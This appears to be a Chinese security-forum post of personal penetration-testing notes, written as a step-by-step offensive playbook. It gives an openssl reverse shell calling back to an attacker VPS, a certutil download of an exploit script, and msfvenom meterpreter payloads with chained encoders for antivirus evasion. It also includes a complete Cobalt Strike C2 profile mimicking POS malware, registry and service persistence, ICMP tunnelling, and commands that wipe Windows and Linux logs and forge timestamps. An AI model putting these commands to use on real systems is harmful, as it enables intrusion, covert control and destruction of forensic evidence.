安全矩阵

 找回密码
 立即注册
搜索
查看: 2819|回复: 0

个人渗透技巧汇总笔记( 压箱底,建议收藏)

[复制链接]

249

主题

299

帖子

1391

积分

金牌会员

Rank: 6Rank: 6

积分
1391
发表于 2022-4-3 12:24:06 | 显示全部楼层 |阅读模式
前言首先我们拿到一个站不能心急,凡事三思而行 跑得太快是会滑倒的。网络安全方面可以看看我的另一篇防范技巧。
当我们获得目标的时候不要急着用扫描器,这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录,什么站能扫什么站不能扫,心里一定要有点b数,不然可能等待的就是不一样的结果了。如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。当然!!!!什么站能扫什么站不能扫,心里一定要有点b数!小提示:在使用proxychains的时候,程序或者终端选项尽量不要设置任何协议的代理,否则可能会打乱这个代理回路出现网络错误。

浅蓝的渗透测试导图以及小工具
这里有一个更加详细的导图,可以做一个大致的方向参考,跟着方向逐一测试,期间也可以巩固基础。地址在这

关注公众号:hack之道,后台回复关键词:666,获取最新渗透教程和工具。
这里再附一个渗透工具包,帮助新手熟悉渗透测试:gorailgun渗透工具
AWVS + Nessus docker
                       
  1. <pre># 拉取镜像</pre><pre>  docker pull leishianquan/awvs-nessus:v1
  2.   # 启动
  3.   docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
  4.   # 查看容器
  5.   docker ps –a
  6.   # 启动容器
  7.   docker start container-id
  8.   # 进入容器
  9.   docker exec –it container-id /bin/bash

  10.   # 进入容器后,启动nessus
  11.   /etc/init.d/nessusd start

  12.   # 访问扫描器地址和账号密码
  13.   Nessus:
  14.   https://127.0.0.1:8834/#/
  15.   account:leishi/leishianquan

  16.   Awvs13:
  17.   https://127.0.0.1:13443/
  18.   account:admin@admin.com/Admin123</pre>
复制代码

                       

ZERO
首先进行信息收集你获得的信息越多对自己后面的渗透就越有帮助,whois,旁站子域,服务器操作系统版本,web中间件以及waf与cdn,通过google与github看看是否存在已知的漏洞这样有助于快速的获得权限,端口扫描并判断服务漏洞加以利用,目录的fuzz,弱口令的fuzz,google hack 进一步探测网站的信息后台以及敏感信息,撒旦天眼也是不错的信息工具。这里也推荐一个公众号:酒仙桥六号补丁
一.时刻关注返回的数据包
漏洞有很多种类型都需要渗透方认证仔细的对每个数据包已经url进行验证,要相信所有的努力都是为成功而付出的。如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等
验证码与邮箱以及token的返回泄露,以及后台为校验从而可删除的参数。截获的敏感数据参数,学会在多个数据包反复尝试。从某个成功请求中捕获数据包观察cookie或者token是否存在规律或加密。通过修改返回的状态值,触发js进行逻辑漏洞的渗透。token的key参数解密构建获取真实user密钥,可拼接、规律、时间戳……
二.FUZZ的艺术
https://www.freebuf.com/vuls/221129.html
三.WEBBYPASS
linux反弹 shell:
  1. <table>
  2.         <tbody>
  3.                 <tr>
  4.                         <td>
  5.                         <pre>1
  6. 2
  7. 3
  8. 4
  9. 5
  10. 6
  11. 7
  12. 8
  13. 9
  14. </pre>
  15.                         </td>
  16.                         <td>
  17.                         <pre>1)VPS 上生成 ssl 证书的公钥/私钥对:
  18. openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  19. 2)VPS 监听反弹 shell:
  20. openssl s_server -quiet -key key.pem -cert cert.pem -port 80
  21. 3)目标上回连 shell:
  22. mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <your_vps>:1024 > /tmp/s; rm /tmp/s

  23. VPS 上已获取加密的 getshell 了。</pre></td></tr></tbody></table>
复制代码

[/table]
winodws桌面:TeamViewerQS单文件
windows下载文件;
certutil -urlcache -split -f https://raw.githubusercontent.co ... VE-2017-11882-v1.py test.py
脚本反弹内网:reGeorg
1.将 tunnel脚本(aspx | ashx | jsp | php)上传到Web服务器,访问显示“Georg says, ‘All seems fine’“,表示脚本运行正常。
2.在攻击者机器上,启动reGeorgSocksProxy.py,监听9999端口,看到 Checking if Georg is ready,确认正常运行,这个时候就可以吧目标机作为跳板了。
waf:中国蚁剑客户端,冰蝎与内存马,反复尝试使用编码字节绕过
四.提权与权限维持
首先通过检查目标服务器的进程与可利用服务以及漏洞
ssl加密payload
  1. <table><tbody><tr><td><pre>
  2. </pre>
  3. </td>
  4.                         <td>
  5.                         <pre>###生成证书并写入文件
  6. openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt

  7. cat  rsaprivate.key servercertificate.crt >my.pem
  8. ###生成payload
  9. msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw

  10. ###监听
  11. msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
  12. </pre>
  13.                         </td>
  14.                 </tr>
  15.         </tbody>
  16. </table>

复制代码
老牌工具Cobaltstrike+Profiles
上云和隐藏流量参考free教程
1.利用keytool生成自己的免费证书(可在kali上生成)
  1. keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
复制代码


                        2.C2.profile文件编辑

  1.                        
  2.                        
  3.                         <pre>set sample_name "tryblog POS Malware";

  4. set sleeptime "5000"; # use a ~30s delay between callbacks
  5. set jitter    "10";    # throw in a 10% jitter

  6. set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

  7. #设置证书,注意以下内容得和你之前生成的证书一样
  8. https-certificate {
  9.     set CN       "TRY";
  10.     set O        "TRY";   
  11.     set C        "TRY";
  12.     set L        "TRY";
  13.     set OU       "TRY";  
  14.     set ST       "TRY";
  15.     set validity "365";
  16. }
  17. #设置,修改成你的证书名称和证书密码
  18. code-signer{
  19.     set keystore "tryblog.store";
  20.     set password "tryblog";
  21.     set alias "tryblog";
  22. }

  23. #指定DNS beacon不用的时候指定到IP地址
  24. set dns_idle "8.8.4.4";

  25. #每个单独DNS请求前强制睡眠时间
  26. set dns_sleep "0";

  27. #通过DNS上载数据时主机名的最大长度[0-255]
  28. set maxdns    "235";

  29. http-post {
  30.     set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";

  31.     client {
  32.         header "Accept" "text/plain";
  33.         header "Accept-Language" "en-us";
  34.         header "Accept-Encoding" "text/plain";
  35.         header "Content-Type" "application/x-www-form-urltrytryd";

  36.         id {
  37.             netbios;
  38.             parameter "id";
  39.         }

  40.         output {
  41.             base64;
  42.             prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
  43.             print;
  44.         }
  45.     }

  46.     server {
  47.         output {
  48.             print;
  49.         }
  50.     }
  51. }

  52. http-get {
  53.     set uri "/updates";

  54.     client {
  55.         metadata {
  56.             netbiosu;
  57.             prepend "user=";
  58.             header "Cookie";
  59.         }
  60.     }

  61.     server {
  62.         header "Content-Type" "text/plain";

  63.         output {
  64.             base64;
  65.             print;
  66.         }
  67.     }
  68. }</pre>
复制代码
                       
3.验证c2lint,启动服务端,载入汉化运行

  1. <table><tbody><tr><td><pre>
  2. </pre>
  3.                         </td>
  4.                         <td>
  5.                         <pre>./c2lint C2.profile
  6. ./teamserver ip:prot ./C2.profile
  7. java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC  -jar cobaltstrike.jar
  8. </pre>
  9.                         </td>
  10.                 </tr>
  11.         </tbody>
  12. </table>
复制代码


免杀远控整理(来自Tide团队)

项目地址:https://github.com/QChiLan/BypassAntiVirus

windows下的免杀生成(顺序从上到下依次混淆)
如果需要捆绑正常软件运行使用shellter,如不能过免杀,再分步测试以下操作。cs文件编码混淆用AVIATOR生成。测试可以再用python再当前目录打开一个web服务器:
  1. python3 -m http.server 8080
复制代码

  1. 1.Lime-Crypter 注入线程

  2. 2.DeepSeaOBFuscator 封装

  3. 3.CryptoObfuscator 混淆

  4. 4.https 证书修改

  5. 5.base64prionx 混淆

  6. 6.themida 加壳

  7. 7.https 证书修改

  8. 8.viper(在线msf处理平台可加特征和签名很方便)

  9. *通用免杀法(简单概括就是1.修改特征码2.花指令免杀3.加壳免杀。)
复制代码
​也可以通过把软件分块用杀软重复扫描找到特征码进行修改,当然也可以通过加载器的形式更加靠谱但是需要落地多个文件,c#文件自己封装推荐avator+掩盖日可以过火绒
Veil
Veil是一种免杀生成工具,用于生成绕过常见防病毒解决方案的metasploit有效负载。
一些payload加料的技巧
1、通过ssl与加壳加密palyoad(免杀)
2、通过dns或套cdn传输
windows
Exploit批量扫描:Windows-Exploit-Suggester
漏洞模块:https://github.com/SecWiki/windows-kernel-exploits
BITS免杀提权:https://github.com/ohpe/juicy-potato
linux
搜寻配置文件中的明文密码、sudo滥用
Exploit批量扫描:linux-exploit-suggester、linux-exploit-suggester-2
漏洞模块:https://github.com/SecWiki/linux-kernel-exploits
五、日志清理(细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心)
windows
遇见不能删除的先停止相关服务:net stop “task scheduler”
系统日志推荐使用工具:clearlog.exe
msf清理:
  1. clearev ,run event_manager -c
复制代码
  1. <table>
  2.         <tbody>
  3.                 <tr>
  4.                         <td>
  5.                         <pre>1
  6. 2
  7. 3
  8. 4
  9. 5
  10. 6
  11. 7
  12. 8
  13. </pre>
  14.                         </td>
  15.                         <td>
  16.                         <pre>防火墙日志路径:%systemroot%\system32\logfiles\
  17. IIS日志路径:%systemroot%\system32\logfles\
  18. windows系统日志:%systemroot%\system32\config\
  19. Scheduler服务日志:%systemroot%\schedlgu.txt
  20. 日志在注册表的键:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
  21. 系统日志:%SystemRoot%\System32\Winevt\Logs\System.evtx
  22. 安全日志:%SystemRoot%\System32\Winevt\Logs\Security.evtx
  23. 应用程序日志:%SystemRoot%\System32\Winevt\Logs\Application.evtx</pre></td></tr></tbody></table>
复制代码
linux(检索根目录以及上级目录是否存在备份)
1.清空当前用户历史命令并删除相关文件:

  1. <p>history -c</p>

  2. <p>echo “”> /root/.bash_history</p>

  3. <p>echo “”> /var/run/utmp</p>
复制代码
2.清除部分日志:
  1. echo “”> /var/log/secure;全删除如不能删除使用echo依次覆盖:rm -f -r /var/log/*;
复制代码
  1. <table><tbody><tr><td><pre>
  2. </pre>
  3.                         </td>
  4.                         <td>
  5.                         <pre>/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息

  6. /var/log/lastlog :记录最后一次用户成功登陆的时间、登陆IP等信息

  7. /var/log/messages :记录Linux操作系统常见的系统和服务错误信息

  8. /var/log/secure :Linux系统安全日志,记录用户和工作组变坏情况、用户登陆认证情况

  9. /var/log/btmp :记录Linux登陆失败的用户、时间以及远程IP地址

  10. /var/log/syslog:只记录警告信息,常常是系统出问题的信息,使用lastlog查看

  11. /var/log/wtmp:该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件,使用last命令查看

  12. /var/log/maillog 与邮件相关的日志信息

  13. /var/log/cron 与定时任务相关的日志信息

  14. /var/log/spooler 与UUCP和news设备相关的日志信息

  15. /var/log/auth.log 系统授权信息,包括用户登录和使用的权限机制等 (debian)

  16. /var/run/utmp:该日志文件记录有关当前登录的每个用户的信息。如 who、w、users、finger等就需要访问这个文件</pre></td></tr></tbody></table>
复制代码
3.更新test.txt的时间和test2.txt时间戳相同:touch -r test.txt test2.txt;设定时间戳:touch -t 201605171210.20 test.txt
web容器路径
数据库通过查询配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml)

  1. <p>winodws</p>

  2. <table>
  3.         <tbody>
  4.                 <tr>
  5.                         <td>
  6.                         <pre>1
  7. 2
  8. 3
  9. </pre>
  10.                         </td>
  11.                         <td>
  12.                         <pre>apche:C:\Program Files\Apache Software Foundation\Apache2.2\htdocs"
  13. tomact:C\Program Files\tomcat\log
  14. nignx: C\Program Files\nginx-1.14.2\logs\
  15. </pre>
  16.                         </td>
  17.                 </tr>
  18.         </tbody>
  19. </table>

  20. <p>

  21. </p><p>linux</p>

  22. <table>
  23.         <tbody>
  24.                 <tr>
  25.                         <td>
  26.                         <pre>1
  27. 2
  28. 3
  29. </pre>
  30.                         </td>
  31.                         <td>
  32.                         <pre>tomcat:/usr/local/tomcat/logs/
  33. apche:/usr/local/apache/logs/access_log
  34. nignx:/var/log/httpd/error_log  rm -f -r /var/log/*</pre></td></tr></tbody></table>
复制代码

七、后渗透与流量隐匿
frsocks+protoplex+流量重定向实现端口复用
protoplex是一个协议复用的工具,比如以下命令可将本地9999端口的流量根据协议类型转到本地的2333和80端口。用于绕过云主机的nsg安全规则。
./frsocks -sockstype fsocks -listen 2333  //创建本地监听./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流,根据协议类型转到本地的2333和80端口
重定向命令

  1. <p>linux:</p>

  2. <div aria-label="代码段 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_codeSnippet cke_widget_selected" contenteditable="false" data-cke-display-name="代码段" data-cke-filter="off" data-cke-widget-id="919" data-cke-widget-wrapper="1" role="region" tabindex="-1">
  3. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22sudo%20iptables%20-t%20nat%20-A%20PREROUTING%20-p%20tcp%20-m%20tcp%20--dport%2080%20-j%20REDIRECT%20--to-ports%209999%5Cn%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
  4. </code></pre>
  5. <span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release2.0.8/ckeditor/plugins/widget/images/handle.png);display:none;"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" height="15" role="presentation" src="" title="点击并拖拽以移动" width="15"></span></div>

  6. <p>windows:</p>

  7. <div aria-label="代码段 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_codeSnippet cke_widget_selected" contenteditable="false" data-cke-display-name="代码段" data-cke-filter="off" data-cke-widget-id="918" data-cke-widget-wrapper="1" role="region" tabindex="-1">
  8. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22netsh%20interface%20portproxy%20add%20v4tov4%20listenport%3D80%20listen%20address%3D192.168.154.129%20connectport%3D9999%20connectaddress%3D192.168.154.129%5Cn%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
  9. </code></pre>
  10. <span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release2.0.8/ckeditor/plugins/widget/images/handle.png);display:none;"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" height="15" role="presentation" src="" title="点击并拖拽以移动" width="15"></span></div>

  11. <table>
  12.         <tbody>
  13.                 <tr>
  14.                         <td>
  15.                         <pre>1
  16. 2
  17. </pre>
  18.                         </td>
  19.                         <td>
  20.                         <pre>netsh interface portproxy show all //查看转发规则
  21. netsh interface portproxy reset   //清除所有转发规则
  22. </pre>
  23.                         </td>
  24.                 </tr>
  25.         </tbody>
  26. </table>
复制代码

[table]

将 IP 流量封装进 IMCP 的 ping 数据包进行传输
工具如下

1、icmptunnel:https://github.com/jamesbarlow/icmptunnel
2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/
3、icmpsh:https://github.com/inquisb/icmpsh
4、Powershell-ICMP:https://github.com/api0cradle/Powershell-ICMP
5、复杂的网络环境可以使用EarchWorm(ew)实现多级代理访问目标主机

后渗透
ps:合理利用后渗透插件可以剩下很多时间,但是要注意痕迹清理。插件有谢公子和梼杌完整版比较常用,Cobaltstrike推荐插件:谢公子、梼杌、Z1-AggressorScripts、ladong


详情参考这个:https://blog.csdn.net/qq_33020901/article/details/98357659
添加开机自启

  1. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f

  2. reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "test" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f
复制代码


                        123456                                                sc create "server power" binpath= "C:\Windows\System32\config.exe"//设置服务的描述字符串sc description "server power" "description" //设置这个服务为自动启动sc config "server power" start= auto net start "server power" 启动服务

       
八、 一个便捷的HACK浏览器(上火狐开发者版本也不错)
这里个人做一个备份有需求的自行google,解释一下英文的插件功能。



Ajax Interceptor:可以自定义ajax的json返回值,前端测试用。
Anti-HoneyPot:红队用,可以检查网页中的蜜罐链接并提示。
ApiRequest.io Ajax Capture Debugging Tool:这个是神器!!强推,可以测试网页中任何的ajax请求包括跨站ajax请求重放,官网提供了只30天的请求历史记录记得保存重要请求。
Decentraleyes:可以拦截一些cdn和本地的文件跟踪器
APK Downloader for Google Play Store :免google框架在线下载应用商店的app。
Buster Captcha Solver for Humans:过goole验证码,有时候识别会比较慢。
Easy WebRTC Block:干掉webrtc的ip回显,避免泄露真实ip
IP Whois & Flags Chrome & Websites Rating:自动在后台测试当前网站ip的归属地然后以小图标的形式返回给前台非常便捷,点击进去还可以看到cdn以及whois信息。
NoScript: 慎用,此插件可以强力的拦截网页上的追踪器来保护用户的隐私与真实信息,但是会造成许多网站打开异常。
Identify web technologies :可以帮你分析当前网站所使用的网络技术与框架。
Shodan:网络搜索引擎同fofa与钟馗之眼,互联网设备大杀器
Picture-in-Picture Extension:画中画悬浮窗口看视频
SourceDetector:可以再后台默默的扫描是否有源代码泄露
HackTools:方便懒人使用点击扩展可快速复制sql,xss,反弹shell。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 14:33 , Processed in 0.014713 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表